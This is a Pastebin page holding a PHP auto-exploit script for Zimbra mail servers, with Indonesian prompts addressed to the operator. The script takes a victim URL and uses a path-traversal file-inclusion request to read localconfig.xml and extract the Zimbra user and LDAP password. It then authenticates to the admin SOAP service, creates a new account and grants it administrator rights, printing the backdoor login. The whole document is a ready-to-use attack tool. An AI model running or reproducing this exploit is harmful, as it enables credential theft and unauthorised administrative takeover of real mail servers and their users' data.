Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/local/bin/php
- <?php
- // Created by Tu5b0l3d - IndoXploit
- // big thx to: duardo Rubina H.
- // http://indoxploit.blogspot.co.id/2015/12/auto-exploiter-zimbra-php.html
- // Cuman di-recode dikit om ama fyelix
- error_reporting(0);
- fwrite(STDOUT, "Masukin url nya tong :");
- $url = filter_var(fgets(STDIN), FILTER_SANITIZE_URL);
- if(isset($url) && !filter_var($url, FILTER_VALIDATE_URL) === FALSE){
- fwrite(STDOUT, "Masukin nama user barunya tong :");
- }else{
- echo "Invalid URL ! Please use ex: http://victimurl.com\n";
- exit(0);
- }
- $newuser = trim(fgets(STDIN));
- if(isset($url) && isset($newuser) && strlen($newuser) > 5){
- fwrite(STDOUT, "Masukin password user barunya tong :");
- }else{
- echo "Minimal ga kurang lima tong biar nyaman < 5\n";
- exit(0);
- }
- $newpass = trim(fgets(STDIN));
- if(isset($url) && isset($newuser) && isset($newpass) && strlen($newpass) > 5){
- checknow($url,$newuser,$newpass);
- }else{
- echo "Ada masalah tong pas mau exploit nya :v\n";
- exit(0);
- }
- function ngecek($url,$post){
- $ch = curl_init ("$url");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data2 = curl_exec ($ch);
- return $data2;
- }
- function nganu_body($toket,$req){
- $body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>$toket</authToken></context></soap:Header><soap:Body>$req</soap:Body></soap:Envelope>";
- return $body;
- }
- function checknow($target,$newuser,$newpass){
- if($target==""){
- echo "\nPlease input victim site !!\n\n";
- exit();
- }
- else{
- $user_baru = $newuser;
- $pwd_baru = $newpass;
- $lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
- $link_lfi = "$target/$lfi";
- echo "# $target\n";
- $ch2 = curl_init ("$link_lfi");
- curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
- curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
- $ambil = curl_exec ($ch2);
- $get_user = explode('<key"]="name=\"zimbra_user\">', $ambil);
- preg_match('/a\["<value>(.*?)<\/value>/', $get_user[1], $user);
- $get_pwd = explode('<key"]="name=\"zimbra_ldap_password\">', $ambil);
- preg_match('/a\["<value>(.*?)<\/value>/', $get_pwd[1], $pwd);
- if($user[1] or $pwd[1] != ""){
- echo "# Pulen nih...\n";
- $body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
- <env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$user[1]</account><password>$pwd[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";
- $link = "https://$target:7071/service/admin/soap";
- $token = ngecek($link,$body);
- preg_match('/<authToken>(.*)<\/authToken>/', $token, $toket);
- if($toket[1]==""){
- echo "# gagal ngambil toket\n\n";
- break;
- }
- else{
- echo "# $toket[1]\n";
- $req = @("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>");
- $body2 = nganu_body($toket[1],$req);
- $liat = ngecek($link,$body2);
- preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $liat, $domain);
- echo "# Creating Account...\n";
- $req2 = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$user_baru@$domain[1]</name><password>$pwd_baru</password></CreateAccountRequest>";
- $body3 = nganu_body($toket[1],$req2);
- $liat2 = ngecek($link,$body3);
- preg_match('/account id="(.*)" name="/', $liat2, $new);
- $req3 = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$new[1]</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>";
- $body4 = nganu_body($toket[1],$req3);
- $liat3 = ngecek($link,$body4);
- echo "# Sukses\n";
- echo "# Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password: $pwd_baru\n\n";
- }
- }
- else{
- echo "# Not Vuln Site\n";
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement